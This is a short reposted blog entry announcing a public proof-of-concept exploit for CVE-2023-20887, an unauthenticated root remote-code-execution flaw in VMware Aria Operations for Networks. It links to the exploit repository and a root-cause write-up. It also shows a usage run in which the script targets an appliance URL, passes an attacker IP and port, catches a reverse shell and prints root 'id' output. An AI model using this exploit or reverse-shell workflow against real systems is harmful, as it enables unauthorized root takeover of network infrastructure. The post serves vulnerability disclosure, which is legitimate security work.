source link: https://movaxbx.ru/2023/06/13/cve-2023-20887-vmware-aria-operations-for-networks-vrealize-network-insight-unauthenticated-rce/

CVE-2023-20887 VMware Aria Operations for Networks (vRealize Network Insight) unauthenticated RCE

Original text by summoning.team

🔥 PoC https://github.com/sinsinology/CVE-2023-20887 for CVE-2023-20887 VMware Aria Operations for Networks (vRealize Network Insight) unauthenticated RCE
This vulnerability allows a remote unauthenticated attacker to execute arbitrary commands on the underlying operating system as the root user. The RPC interface is protected by a reverse proxy which can be bypassed.

🔖 RCA here https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/

Usage:

$ python CVE-2023-20887.py --url https://192.168.116.100 --attacker 192.168.116.1:1337
VMWare Aria Operations for Networks (vRealize Network Insight) pre-authenticated RCE || Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)
(*) Starting handler
(+) Received connection from 192.168.116.100
(+) pop thy shell! (it's ready)
$ sudo bash
$ id
uid=0(root) gid=0(root) groups=0(root)
$ hostname
vrni-platform-release
